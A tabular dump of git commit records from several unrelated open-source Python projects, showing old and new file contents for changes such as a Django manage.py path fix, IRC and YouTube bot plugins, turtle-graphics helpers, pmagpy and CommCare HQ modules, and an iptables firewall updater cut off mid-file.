commit stringlengths 40 40 | subject stringlengths 4 1.73k | repos stringlengths 5 127k | old_file stringlengths 2 751 | new_file stringlengths 2 751 | new_contents stringlengths 1 8.98k | old_contents stringlengths 0 6.59k | license stringclasses 13
values | lang stringclasses 23
values |
|---|---|---|---|---|---|---|---|---|
457b6c74c676478f4045d0a9801fa81a3d75d714 | Change how manage.py injects local directory into sys.path to ensure it overwrites other instalations | Linaro/lava-server,Linaro/lava-server,OSSystems/lava-server,OSSystems/lava-server,Linaro/lava-server,OSSystems/lava-server,Linaro/lava-server | dashboard_server/manage.py | dashboard_server/manage.py | #!/usr/bin/python
#
# Copyright (C) 2010 Linaro Limited
#
# Author: Zygmunt Krynicki <zygmunt.krynicki@linaro.org>
#
# This file is part of Launch Control.
#
# Launch Control is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License version 3
# as published by the Free Software Foundation
#
# Launch Control is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Launch Control. If not, see <http://www.gnu.org/licenses/>.
def find_sources():
import os
import sys
base_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"..")
if os.path.exists(os.path.join(base_path, "launch_control")):
sys.path.insert(0, base_path)
find_sources()
from django.core.management import execute_manager
try:
import settings # Assumed to be in the same directory.
except ImportError:
import sys
sys.stderr.write("Error: Can't find the file 'settings.py' in the directory containing %r. It appears you've customized things.\nYou'll have to run django-admin.py, passing it your settings module.\n(If the file settings.py does indeed exist, it's causing an ImportError somehow.)\n" % __file__)
sys.exit(1)
if __name__ == "__main__":
execute_manager(settings)
| #!/usr/bin/python
#
# Copyright (C) 2010 Linaro Limited
#
# Author: Zygmunt Krynicki <zygmunt.krynicki@linaro.org>
#
# This file is part of Launch Control.
#
# Launch Control is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License version 3
# as published by the Free Software Foundation
#
# Launch Control is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Launch Control. If not, see <http://www.gnu.org/licenses/>.
def find_sources():
import os
import sys
base_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"..")
if os.path.exists(os.path.join(base_path, "launch_control")):
sys.path.append(base_path)
find_sources()
from django.core.management import execute_manager
try:
import settings # Assumed to be in the same directory.
except ImportError:
import sys
sys.stderr.write("Error: Can't find the file 'settings.py' in the directory containing %r. It appears you've customized things.\nYou'll have to run django-admin.py, passing it your settings module.\n(If the file settings.py does indeed exist, it's causing an ImportError somehow.)\n" % __file__)
sys.exit(1)
if __name__ == "__main__":
execute_manager(settings)
| agpl-3.0 | Python |
708ad4b2d8f0e7fda71be1b8c20442f01b7c8f07 | Fix history casebug | svkampen/James | plugins/history.py | plugins/history.py | """
History
"""
from .util.decorators import command
@command('history')
def history(bot, nick, target, chan, arg):
""" Get user's history. """
args = arg.split()
try:
if len(args) > 2 or len(args) < 2 or int(args[1]) > 16 or int(args[1]) < 1:
return bot.msg(chan, "Usage: +history <nick> <1-16>")
victim = args[0].lower()
num = int(args[1])
bot.msg(chan, "\n".join(reversed(["<" + victim + "> " + x for x in bot.lastmsgof[chan][victim]][0:num])))
except:
bot.msg(chan, "Usage: +history <nick> <number>")
| """
History
"""
from .util.decorators import command
@command('history')
def history(bot, nick, target, chan, arg):
""" Get user's history. """
args = arg.split()
try:
if len(args) > 2 or len(args) < 2 or int(args[1]) > 16 or int(args[1]) < 1:
return bot.msg(chan, "Usage: +history <nick> <1-16>")
victim = args[0]
num = int(args[1])
bot.msg(chan, "\n".join(reversed(["<" + victim + "> " + x for x in bot.lastmsgof[chan][victim]][0:num])))
except:
bot.msg(chan, "Usage: +history <nick> <number>")
| mit | Python |
9eb2347e1f1d36acb22d49341e066286146fdd17 | use cron | fhirschmann/tucan | tucanwatch.py | tucanwatch.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import mechanize
from lxml import html
def get_grades(username, password):
br = mechanize.Browser()
br.open("https://www.tucan.tu-darmstadt.de")
br.select_form(nr=0)
br.form["usrname"] = username
br.form["pass"] = password
br.submit()
br.follow_link(text_regex=u"^Prüfungen$")
br.follow_link(text_regex=u"^Semesterergebnisse$")
br.follow_link(text_regex=u"^Prüfungsergebnisse$")
tree = html.fromstring(br.response().read())
tbody = tree.xpath("//table[@class='nb list']/tbody")[0]
grades = [[" ".join("".join(c for c in td.text if c.isalnum()
or c in (".", " ", "-", ",")).strip().split())
for td in tr.findall("td")][:-1] for tr in tbody.findall("tr")]
return grades
def grades2set(grades):
return set([e[0] + ": " + e[2] for e in grades])
if __name__ == "__main__":
import sys
from netrc import netrc
username, account, password = netrc().authenticators("www.tucan.tu-darmstadt.de")
grades = grades2set(get_grades(username, password))
if "-p" in sys.argv:
print(*grades, sep=os.linesep)
else:
import shelve
data = shelve.open(os.path.expanduser("~/.tucan.grades"))
if "grades" not in data:
data["grades"] = set()
if data["grades"] != grades:
print("The following new grades are available:",
*grades.difference(data["grades"]), sep=os.linesep)
data["grades"] = grades
data.close()
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
import mechanize
from lxml import html
def get_grades(username, password):
br = mechanize.Browser()
br.open("https://www.tucan.tu-darmstadt.de")
br.select_form(nr=0)
br.form["usrname"] = username
br.form["pass"] = password
br.submit()
br.follow_link(text_regex=u"^Prüfungen$")
br.follow_link(text_regex=u"^Semesterergebnisse$")
br.follow_link(text_regex=u"^Prüfungsergebnisse$")
tree = html.fromstring(br.response().read())
tbody = tree.xpath("//table[@class='nb list']/tbody")[0]
grades = [[" ".join("".join(c for c in td.text if c.isalnum()
or c in (".", " ", "-", ",")).strip().split())
for td in tr.findall("td")][:-1] for tr in tbody.findall("tr")]
return grades
def grades2set(grades):
return set([e[0] + ": " + e[2] for e in grades])
if __name__ == "__main__":
import sys
from netrc import netrc
username, account, password = netrc().authenticators("www.tucan.tu-darmstadt.de")
grades = grades2set(get_grades(username, password))
if "-p" in sys.argv:
print("\n".join(grades))
else:
import subprocess
from time import sleep
while True:
sleep(60 * 60)
grades2 = grades2set(get_grades(username, password))
diff = grades2.difference(grades)
if len(diff) > 0:
proc = subprocess.Popen(["mail", "-s", "New Grade in TuCaN", "fabian@0x0b.de"],
stdin=subprocess.PIPE)
proc.stdin.write("\n".join(diff))
proc.stdin.close()
proc.terminate()
grades = grades2
| mit | Python |
6ff6f7ecf75551dc49685c4bb0501e6f4b2de854 | Fix for regression test, since we rely on the formatter for std::vector in the test we need a libc++ category. | llvm-mirror/lldb,apple/swift-lldb,llvm-mirror/lldb,llvm-mirror/lldb,apple/swift-lldb,apple/swift-lldb,llvm-mirror/lldb,apple/swift-lldb,apple/swift-lldb,llvm-mirror/lldb,apple/swift-lldb | packages/Python/lldbsuite/test/expression_command/vector_of_enums/TestVectorOfEnums.py | packages/Python/lldbsuite/test/expression_command/vector_of_enums/TestVectorOfEnums.py | """
Test Expression Parser regression test to ensure that we handle enums
correctly, in this case specifically std::vector of enums.
"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestVectorOfEnums(TestBase):
mydir = TestBase.compute_mydir(__file__)
@add_test_categories(["libc++"])
def test_vector_of_enums(self):
self.build()
lldbutil.run_to_source_breakpoint(self, '// break here',
lldb.SBFileSpec("main.cpp", False))
self.expect("expr v", substrs=[
'size=3',
'[0] = a',
'[1] = b',
'[2] = c',
'}'
])
| """
Test Expression Parser regression test to ensure that we handle enums
correctly, in this case specifically std::vector of enums.
"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestVectorOfEnums(TestBase):
mydir = TestBase.compute_mydir(__file__)
def test_vector_of_enums(self):
self.build()
lldbutil.run_to_source_breakpoint(self, '// break here',
lldb.SBFileSpec("main.cpp", False))
self.expect("expr v", substrs=[
'size=3',
'[0] = a',
'[1] = b',
'[2] = c',
'}'
])
| apache-2.0 | Python |
df7e834b8418aeeeaee7fb90b953468c2490b93d | Add Ascii Art & Version Number | ekonstantinidis/pypiup | pypiup/cli.py | pypiup/cli.py | import __init__
import os
import click
from pypiup.requirements import Requirements
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
@click.command()
@click.option('--requirement', '-r', default='requirements.txt', type=click.STRING, help='Specify the path of the requirements file. Defaults to "requirements.txt".')
@click.option('--demo', '-d', is_flag=True, help='Load the demo requirements.txt file that comes with the package.')
def cli(requirement, demo):
"""
PyPIup\n
Check whether your PyPI requirements are up to date.
"""
print("\n ______ __ __ ______ __ __ __ ______ ")
print("/\ == \ /\ \_\ \ /\ == \ /\ \ /\ \/\ \ /\ == \ ")
print("\ \ _-/ \ \____ \ \ \ _-/ \ \ \ \ \ \_\ \ \ \ _-/ ")
print(" \ \_\ \/\_____\ \ \_\ \ \_\ \ \_____\ \ \_\ ")
print(" \/_/ \/_____/ \/_/ \/_/ \/_____/ \/_/ ")
print("\nhttps://github.com/ekonstantinidis/pypiup")
print("Version %s" % __init__.__version__)
if demo:
demo_path = os.path.join(BASE_DIR, 'requirements/requirements-demo.txt')
return Requirements(demo_path)
Requirements(requirement)
if __name__ == '__main__':
cli()
| import os
import click
from pypiup.requirements import Requirements
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
@click.command()
@click.option('--requirement', '-r', default='requirements.txt', type=click.STRING, help='Specify the path of the requirements file. Defaults to "requirements.txt".')
@click.option('--demo', '-d', is_flag=True, help='Load the demo requirements.txt file that comes with the package.')
def cli(requirement, demo):
"""
PyPIup\n
Check whether your PyPI requirements are up to date.
"""
if demo:
demo_path = os.path.join(BASE_DIR, 'requirements/requirements-demo.txt')
return Requirements(demo_path)
Requirements(requirement)
if __name__ == '__main__':
cli()
| bsd-2-clause | Python |
e0423d453189508bdb73fc78320b5736bc127fd4 | Bump version | felliott/waterbutler,Johnetordoff/waterbutler,TomBaxter/waterbutler,CenterForOpenScience/waterbutler,kwierman/waterbutler,RCOSDP/waterbutler,chrisseto/waterbutler,icereval/waterbutler,rafaeldelucena/waterbutler,rdhyee/waterbutler,hmoco/waterbutler,Ghalko/waterbutler,cosenal/waterbutler | waterbutler/__init__.py | waterbutler/__init__.py | __version__ = '0.2.2'
__import__("pkg_resources").declare_namespace(__name__)
| __version__ = '0.2.1'
__import__("pkg_resources").declare_namespace(__name__)
| apache-2.0 | Python |
6833bd136086e0e46fabb3921c65d22325857c56 | add utility for getting domains created by a user | dimagi/commcare-hq,qedsoftware/commcare-hq,qedsoftware/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,qedsoftware/commcare-hq,qedsoftware/commcare-hq,dimagi/commcare-hq,qedsoftware/commcare-hq,dimagi/commcare-hq | corehq/apps/domain/utils.py | corehq/apps/domain/utils.py | import re
from couchdbkit import ResourceNotFound
from django.conf import settings
from corehq import toggles
from corehq.apps.domain.models import Domain
from corehq.util.quickcache import quickcache
from dimagi.utils.couch.database import get_db
from corehq.apps.es import DomainES
DOMAIN_MODULE_KEY = 'DOMAIN_MODULE_CONFIG'
ADM_DOMAIN_KEY = 'ADM_ENABLED_DOMAINS'
new_domain_re = r"(?:[a-z0-9]+\-)*[a-z0-9]+" # lowercase letters, numbers, and '-' (at most one between "words")
grandfathered_domain_re = r"[a-z0-9\-\.:]+"
legacy_domain_re = r"[\w\.:-]+"
commcare_public_domain_url = '/a/public/'
website_re = '(http(s?)\:\/\/|~/|/)?([a-zA-Z]{1}([\w\-]+\.)+([\w]{2,5}))(:[\d]{1,5})?/?(\w+\.[\w]{3,4})?((\?\w+=\w+)?(&\w+=\w+)*)?'
def normalize_domain_name(domain):
if domain:
normalized = domain.replace('_', '-').lower()
if settings.DEBUG:
assert(re.match('^%s$' % grandfathered_domain_re, normalized))
return normalized
return domain
def get_domained_url(domain, path):
return '/a/%s/%s' % (domain, path)
def get_domain_from_url(path):
try:
domain, = re.compile(r'^/a/(?P<domain>%s)/' % legacy_domain_re).search(path).groups()
except Exception:
domain = None
return domain
@quickcache([], timeout=60)
def get_domain_module_map():
hardcoded = getattr(settings, 'DOMAIN_MODULE_MAP', {})
try:
dynamic = get_db().open_doc('DOMAIN_MODULE_CONFIG').get('module_map', {})
except ResourceNotFound:
dynamic = {}
hardcoded.update(dynamic)
return hardcoded
def domain_restricts_superusers(domain):
domain = Domain.get_by_name(domain)
if not domain:
return False
return domain.restrict_superusers
def get_dummy_domain(domain_type=None):
domain_type = domain_type or 'commcare'
dummy_domain = Domain()
dummy_domain.commtrack_enabled = (domain_type == 'commtrack')
return dummy_domain
def user_has_custom_top_menu(domain_name, couch_user):
"""
This is currently used for a one-off custom case (ewsghana, ilsgateway)
that required to be a toggle instead of a custom domain module setting
"""
return (toggles.CUSTOM_MENU_BAR.enabled(domain_name) and
not couch_user.is_superuser)
def get_domains_created_by_user(creating_user):
query = DomainES().created_by_user(creating_user)
data = query.run()
return [d['name'] for d in data.hits]
| import re
from couchdbkit import ResourceNotFound
from django.conf import settings
from corehq import toggles
from corehq.apps.domain.models import Domain
from corehq.util.quickcache import quickcache
from dimagi.utils.couch.database import get_db
DOMAIN_MODULE_KEY = 'DOMAIN_MODULE_CONFIG'
ADM_DOMAIN_KEY = 'ADM_ENABLED_DOMAINS'
new_domain_re = r"(?:[a-z0-9]+\-)*[a-z0-9]+" # lowercase letters, numbers, and '-' (at most one between "words")
grandfathered_domain_re = r"[a-z0-9\-\.:]+"
legacy_domain_re = r"[\w\.:-]+"
commcare_public_domain_url = '/a/public/'
website_re = '(http(s?)\:\/\/|~/|/)?([a-zA-Z]{1}([\w\-]+\.)+([\w]{2,5}))(:[\d]{1,5})?/?(\w+\.[\w]{3,4})?((\?\w+=\w+)?(&\w+=\w+)*)?'
def normalize_domain_name(domain):
if domain:
normalized = domain.replace('_', '-').lower()
if settings.DEBUG:
assert(re.match('^%s$' % grandfathered_domain_re, normalized))
return normalized
return domain
def get_domained_url(domain, path):
return '/a/%s/%s' % (domain, path)
def get_domain_from_url(path):
try:
domain, = re.compile(r'^/a/(?P<domain>%s)/' % legacy_domain_re).search(path).groups()
except Exception:
domain = None
return domain
@quickcache([], timeout=60)
def get_domain_module_map():
hardcoded = getattr(settings, 'DOMAIN_MODULE_MAP', {})
try:
dynamic = get_db().open_doc('DOMAIN_MODULE_CONFIG').get('module_map', {})
except ResourceNotFound:
dynamic = {}
hardcoded.update(dynamic)
return hardcoded
def domain_restricts_superusers(domain):
domain = Domain.get_by_name(domain)
if not domain:
return False
return domain.restrict_superusers
def get_dummy_domain(domain_type=None):
domain_type = domain_type or 'commcare'
dummy_domain = Domain()
dummy_domain.commtrack_enabled = (domain_type == 'commtrack')
return dummy_domain
def user_has_custom_top_menu(domain_name, couch_user):
"""
This is currently used for a one-off custom case (ewsghana, ilsgateway)
that required to be a toggle instead of a custom domain module setting
"""
return (toggles.CUSTOM_MENU_BAR.enabled(domain_name) and
not couch_user.is_superuser)
| bsd-3-clause | Python |
695fb09b1f048878cd7358e1e536aee2313b6d61 | Include listenonrepeat.com in regex for #39 | tomleese/smartbot,Muzer/smartbot,Cyanogenoid/smartbot,thomasleese/smartbot-old | plugins/youtube.py | plugins/youtube.py | import re
import urllib
import isodate
import requests
import smartbot
from smartbot import utils
from smartbot.exceptions import *
from smartbot.formatting import *
REGEX = r"(?:https?://)?(?:www\.)?(?:youtu\.?be|listenonrepeat)(?:\.com)?/(?:watch/?\?v=)?([^\s]+)"
class Plugin(smartbot.Plugin):
"""Get information about posted YouTube videos."""
names = ["youtube", "utube"]
def __init__(self, key):
self.key = key
def _get_reply(self, i, video):
channelTitle = video["snippet"]["channelTitle"]
duration = isodate.parse_duration(video["contentDetails"]["duration"])
views = video["statistics"]["viewCount"]
likes = video["statistics"]["likeCount"]
dislikes = video["statistics"]["dislikeCount"]
thumbnail = video["snippet"]["thumbnails"]["default"]["url"]
return "{}: {} | {} | {} {} {} | {}".format(
self.bot.format("[{}]".format(i), Style.bold),
channelTitle,
duration,
views,
self.bot.format(likes, Colour.fg_green),
self.bot.format(dislikes, Colour.fg_red),
self.bot.format(thumbnail, Colour.fg_grey)
)
def on_message(self, msg, reply):
match = re.findall(REGEX, msg["message"], re.IGNORECASE)
for i, video_id in enumerate(match):
url = "https://www.googleapis.com/youtube/v3/videos"
payload = {
"key": self.key,
"id": video_id,
"part": ",".join(["contentDetails", "snippet", "statistics"])
}
s = utils.web.requests_session()
res = s.get(url, params=payload).json()
if res["items"]:
video = res["items"][0]
reply(self._get_reply(i, video))
def on_help(self):
return "Sends information about YouTube URLs posted."
| import re
import urllib
import isodate
import requests
import smartbot
from smartbot import utils
from smartbot.exceptions import *
from smartbot.formatting import *
REGEX = r"(?:https?://)?(?:www\.)?youtu\.?be(?:\.com)?/(?:watch\?v=)?([^\s]+)"
class Plugin(smartbot.Plugin):
"""Get information about posted YouTube videos."""
names = ["youtube", "utube"]
def __init__(self, key):
self.key = key
def _get_reply(self, i, video):
channelTitle = video["snippet"]["channelTitle"]
duration = isodate.parse_duration(video["contentDetails"]["duration"])
views = video["statistics"]["viewCount"]
likes = video["statistics"]["likeCount"]
dislikes = video["statistics"]["dislikeCount"]
thumbnail = video["snippet"]["thumbnails"]["default"]["url"]
return "{}: {} | {} | {} {} {} | {}".format(
self.bot.format("[{}]".format(i), Style.bold),
channelTitle,
duration,
views,
self.bot.format(likes, Colour.fg_green),
self.bot.format(dislikes, Colour.fg_red),
self.bot.format(thumbnail, Colour.fg_grey)
)
def on_message(self, msg, reply):
match = re.findall(REGEX, msg["message"], re.IGNORECASE)
for i, video_id in enumerate(match):
url = "https://www.googleapis.com/youtube/v3/videos"
payload = {
"key": self.key,
"id": video_id,
"part": ",".join(["contentDetails", "snippet", "statistics"])
}
s = utils.web.requests_session()
res = s.get(url, params=payload).json()
if res["items"]:
video = res["items"][0]
reply(self._get_reply(i, video))
def on_help(self):
return "Sends information about YouTube URLs posted."
| mit | Python |
088286502b545b65a63ce0e7e44f584faac3aa4b | Add Pox. Also remove erroneous left() from square | silshack/fall2013turtlehack | turtlehack.py | turtlehack.py | import turtle
import random
# A function that takes a turtle, a radius, a color, and an optional thickness and draws a circle
def colored_circle(turtle, radius, color, thickness = 1):
turtle.width(thickness)
turtle.color(color)
turtle.circle(radius)
# A function that takes a side length and a color and makes a square.
def colored_square(turtle, side_length, color):
turtle.color(color)
for i in range(4):
turtle.forward(side_length)
turtle.left(90)
turtle.left(90)
# A function that take a turtle, dot size, color, and number of dots in line to make a dotted line
def dotted_line(turtle, number_of_dots, dot_size, color):
for i in range(number_of_dots):
turtle.dot(dot_size, color)
turtle.penup()
turtle.forward(dot_size * 2)
turtle.pendown()
# A function that takes a number and makes that many random sized circles
def random_circle(turtle, number_of_circles, max_size = 100):
for i in range(number_of_circles):
turtle.circle(random.randint(0,max_size + 1))
# A function that changes the turtle's color to a random color
def random_color():
'''
returns a random hex value
'''
color_value = format(random.randint(0,16777215),'06x')
return "#" +color_value
# A function that takes a turtle and a pair of numbers and sets the turtle to a random location from x to -x and y to -y
def random_location(turtle, x, y):
random_x = turtle.xcor() + random.randint(-x, x)
random_y = turtle.ycor() + random.randint(-y, y)
turtle.setpos(random_x, random_y)
# A function that makes n random colored and located dots inside x, y
# Thanks to Stacey Mantooth for the idea
def pox(turtle, x, y, n = 10):
origx = turtle.xcor()
origy = turtle.ycor()
turtle.penup()
for i in range(n):
random_location(turtle, x, y)
turtle.dot(random.randint(3, 10), random_color())
turtle.setpos(origx, origy)
turtle.pendown()
# A function that draws an n-sided polygon
def n_sided_polygon(turtle, n, color="#FFFFFF", line_thickness=1, line_length=80):
'''
Draw an n-sided polygon
input: turtle, number of sides, line color, line thickness, line length
'''
# for n times:
# Draw a line, then turn 360/n degrees and draw another
# set initial parameters
turtle.degrees()
turtle.pensize(line_thickness)
turn_angle = (360/n)
# Draw each line segment and turn
for i in range(0,n):
turtle.color(color)
turtle.pendown()
turtle.forward(line_length)
turtle.penup()
turtle.left(turn_angle)
# return the turtle to its original starting location
turtle.left(turn_angle)
return 0
| import turtle
import random
# A function that takes a turtle, a radius, a color, and an optional thickness and draws a circle
def colored_circle(turtle, radius, color, thickness = 1):
turtle.width(thickness)
turtle.color(color)
turtle.circle(radius)
# A function that takes a side length and a color and makes a square.
def colored_square(turtle, side_length, color):
turtle.color(color)
for i in range(4):
turtle.forward(side_length)
turtle.left(90)
turtle.left(90)
# A function that take a turtle, dot size, color, and number of dots in line to make a dotted line
def dotted_line(turtle, number_of_dots, dot_size, color):
for i in range(number_of_dots):
turtle.dot(dot_size, color)
turtle.penup()
turtle.forward(dot_size * 2)
turtle.pendown()
# A function that takes a number and makes that many random sized circles
def random_circle(turtle, number_of_circles, max_size = 100):
for i in range(number_of_circles):
turtle.circle(random.randint(0,max_size + 1))
# A function that changes the turtle's color to a random color
def random_color():
'''
returns a random hex value
'''
color_value = format(random.randint(0,16777215),'06x')
return "#" +color_value
# A function that takes a turtle and a pair of numbers and sets the turtle to a random location from x to -x and y to -y
def random_location(turtle, x, y):
random_x = random.randint(-x, x)
random_y = random.randint(-y, y)
turtle.setpos(random_x, random_y)
# A function that draws an n-sided polygon
def n_sided_polygon(turtle, n, color="#FFFFFF", line_thickness=1, line_length=80):
'''
Draw an n-sided polygon
input: turtle, number of sides, line color, line thickness, line length
'''
# for n times:
# Draw a line, then turn 360/n degrees and draw another
# set initial parameters
turtle.degrees()
turtle.pensize(line_thickness)
turn_angle = (360/n)
# Draw each line segment and turn
for i in range(0,n):
turtle.color(color)
turtle.pendown()
turtle.forward(line_length)
turtle.penup()
turtle.left(turn_angle)
# return the turtle to its original starting location
turtle.left(turn_angle)
return 0
| mit | Python |
6c9a3e5133115a4724c8499380ee690a9cca0552 | Add Exception on import of pmagpy if using wrong Python version (should be impossible to install this version, but people are tricky….) | lfairchild/PmagPy,lfairchild/PmagPy,Caoimhinmg/PmagPy,lfairchild/PmagPy,Caoimhinmg/PmagPy,Caoimhinmg/PmagPy | pmagpy/__init__.py | pmagpy/__init__.py | from __future__ import absolute_import
import sys
if sys.version_info <= (3,):
raise Exception("""
You are running Python {}.
This version of pmagpy is only compatible with Python 3.
Make sure you have pip >= 9.0 to avoid this kind of issue,
as well as setuptools >= 24.2:
$ pip install pip setuptools --upgrade
Then you should be able to download the correct version of pmagpy:
$ pip install pmagpy --upgrade
If this still gives you an error, please report the issue:
https://github.com/PmagPy/PmagPy/issues
Thanks!
""".format(sys.version))
from . import pmag
from . import ipmag
from . import pmagplotlib
from . import find_pmag_dir
from . import version
from . import controlled_vocabularies2 as controlled_vocabularies
from . import data_model3
from . import new_builder
from . import mapping
#import set_env
__all__ = [pmag, ipmag, pmagplotlib, find_pmag_dir, version,
controlled_vocabularies, data_model3, new_builder,
mapping]
| from __future__ import absolute_import
from . import pmag
from . import ipmag
from . import pmagplotlib
from . import find_pmag_dir
from . import version
from . import controlled_vocabularies2 as controlled_vocabularies
from . import data_model3
from . import new_builder
from . import mapping
#import set_env
__all__ = [pmag, ipmag, pmagplotlib, find_pmag_dir, version,
controlled_vocabularies, data_model3, new_builder,
mapping]
| bsd-3-clause | Python |
05f4a8af5f856f2451f1f9e2be262876f53f67ef | Bump schema version :disappointed: | dimagi/commcare-hq,qedsoftware/commcare-hq,qedsoftware/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,qedsoftware/commcare-hq,qedsoftware/commcare-hq,qedsoftware/commcare-hq,dimagi/commcare-hq | corehq/apps/export/const.py | corehq/apps/export/const.py | """
Some of these constants correspond to constants set in corehq/apps/export/static/export/js/const.js
so if changing a value, ensure that both places reflect the change
"""
from couchexport.deid import (
deid_ID,
deid_date
)
from corehq.apps.export.transforms import (
case_id_to_case_name,
user_id_to_username,
owner_id_to_display,
)
# When fixing a bug that requires existing schemas to be rebuilt,
# bump the version number.
DATA_SCHEMA_VERSION = 6
DEID_ID_TRANSFORM = "deid_id"
DEID_DATE_TRANSFORM = "deid_date"
DEID_TRANSFORM_FUNCTIONS = {
DEID_ID_TRANSFORM: deid_ID,
DEID_DATE_TRANSFORM: deid_date,
}
CASE_NAME_TRANSFORM = "case_name_transform"
USERNAME_TRANSFORM = "username_transform"
OWNER_ID_TRANSFORM = "owner_id_transform"
TRANSFORM_FUNCTIONS = {
CASE_NAME_TRANSFORM: case_id_to_case_name,
USERNAME_TRANSFORM: user_id_to_username,
OWNER_ID_TRANSFORM: owner_id_to_display,
}
PLAIN_USER_DEFINED_SPLIT_TYPE = 'plain'
MULTISELCT_USER_DEFINED_SPLIT_TYPE = 'multi-select'
USER_DEFINED_SPLIT_TYPES = [
PLAIN_USER_DEFINED_SPLIT_TYPE,
MULTISELCT_USER_DEFINED_SPLIT_TYPE,
]
PROPERTY_TAG_NONE = None
PROPERTY_TAG_INFO = 'info'
PROPERTY_TAG_CASE = 'case'
PROPERTY_TAG_UPDATE = 'update'
PROPERTY_TAG_SERVER = 'server'
PROPERTY_TAG_DELETED = 'deleted'
PROPERTY_TAG_ROW = 'row'
PROPERTY_TAG_APP = "app"
PROPERTY_TAG_STOCK = 'stock'
# Yeah... let's not hard code this list everywhere
# This list comes from casexml.apps.case.xml.parser.CaseActionBase.from_v2
KNOWN_CASE_PROPERTIES = ["type", "name", "external_id", "user_id", "owner_id", "opened_on"]
FORM_EXPORT = 'form'
CASE_EXPORT = 'case'
MAX_EXPORTABLE_ROWS = 100000
CASE_SCROLL_SIZE = 10000
# When a question is missing completely from a form/case this should be the value
MISSING_VALUE = '---'
# When a question has been answered, but is blank, this shoudl be the value
EMPTY_VALUE = ''
| """
Some of these constants correspond to constants set in corehq/apps/export/static/export/js/const.js
so if changing a value, ensure that both places reflect the change
"""
from couchexport.deid import (
deid_ID,
deid_date
)
from corehq.apps.export.transforms import (
case_id_to_case_name,
user_id_to_username,
owner_id_to_display,
)
# When fixing a bug that requires existing schemas to be rebuilt,
# bump the version number.
DATA_SCHEMA_VERSION = 5
DEID_ID_TRANSFORM = "deid_id"
DEID_DATE_TRANSFORM = "deid_date"
DEID_TRANSFORM_FUNCTIONS = {
DEID_ID_TRANSFORM: deid_ID,
DEID_DATE_TRANSFORM: deid_date,
}
CASE_NAME_TRANSFORM = "case_name_transform"
USERNAME_TRANSFORM = "username_transform"
OWNER_ID_TRANSFORM = "owner_id_transform"
TRANSFORM_FUNCTIONS = {
CASE_NAME_TRANSFORM: case_id_to_case_name,
USERNAME_TRANSFORM: user_id_to_username,
OWNER_ID_TRANSFORM: owner_id_to_display,
}
PLAIN_USER_DEFINED_SPLIT_TYPE = 'plain'
MULTISELCT_USER_DEFINED_SPLIT_TYPE = 'multi-select'
USER_DEFINED_SPLIT_TYPES = [
PLAIN_USER_DEFINED_SPLIT_TYPE,
MULTISELCT_USER_DEFINED_SPLIT_TYPE,
]
PROPERTY_TAG_NONE = None
PROPERTY_TAG_INFO = 'info'
PROPERTY_TAG_CASE = 'case'
PROPERTY_TAG_UPDATE = 'update'
PROPERTY_TAG_SERVER = 'server'
PROPERTY_TAG_DELETED = 'deleted'
PROPERTY_TAG_ROW = 'row'
PROPERTY_TAG_APP = "app"
PROPERTY_TAG_STOCK = 'stock'
# Yeah... let's not hard code this list everywhere
# This list comes from casexml.apps.case.xml.parser.CaseActionBase.from_v2
KNOWN_CASE_PROPERTIES = ["type", "name", "external_id", "user_id", "owner_id", "opened_on"]
FORM_EXPORT = 'form'
CASE_EXPORT = 'case'
MAX_EXPORTABLE_ROWS = 100000
CASE_SCROLL_SIZE = 10000
# When a question is missing completely from a form/case this should be the value
MISSING_VALUE = '---'
# When a question has been answered, but is blank, this shoudl be the value
EMPTY_VALUE = ''
| bsd-3-clause | Python |
ef275bd9ff509842161397b81af8ac765c0bab3a | patch to work properly for ALL | dparlevliet/elastic-firewall,dparlevliet/elastic-firewall,dparlevliet/elastic-firewall | update_firewall.py | update_firewall.py | #! /usr/bin/python
import sys
import os
import json
import socket
import ext.iptables as ipt
class ElasticRules():
rules = {
'allowed_ips': {},
'ports': {},
}
def add_port_rule(self, port, whom, type):
key = "%s:%s:%s" % (port, type, whom)
self.rules['ports'][key] = (port, whom, type)
def remove_port_rule(self, port, whom, type):
key = "%s:%s:%s" % (port, type, whom)
if key not in self.rules['ports']:
return None
del self.rules['ports'][key]
def add_allowed_ip(self, ip):
self.rules['allowed_ips'][ip] = True
def remove_allowed_ip(self, ip):
if ip not in self.rules:
return None
self.rules['allowed_ips'][ip] = False
def load(self):
try:
self.rules = json.loads(open('./rules.json').read())
except:
pass
def save(self):
for ip, allowed in self.rules['allowed_ips'].iteritems():
if not allowed:
del self.rules['allowed_ips'][ip]
return open('./rules.json', 'w').write(json.dumps(self.rules, separators=(',', ':')))
def update_firewall(self):
for key, rule in self.rules['ports'].iteritems():
if rule[1] == 'all':
ipt.all_new(rule[0], rule[2])
else:
for ip in self.rules['allowed_ips']:
ipt.ip_new(ip, rule[0], rule[2])
def main():
rules = ElasticRules()
rules.load()
config = json.loads(open('./config.json').read())
# I hate exec. Keep an eye out for better solutions to this
exec "from api.%s import Api" % config['server_group']
api = Api()
for key in config[config['server_group']]:
setattr(api, key, config[config['server_group']][key])
api.grab_servers()
found_ips = []
hostname = socket.gethostname()
if hostname in config['hostnames']:
for server in config['hostnames'][hostname]['allow']:
for ip in api.get_servers(server):
rules.add_allowed_ip(ip)
found_ips.append(ip)
for ip in config['hostnames'][hostname]['safe_ips']:
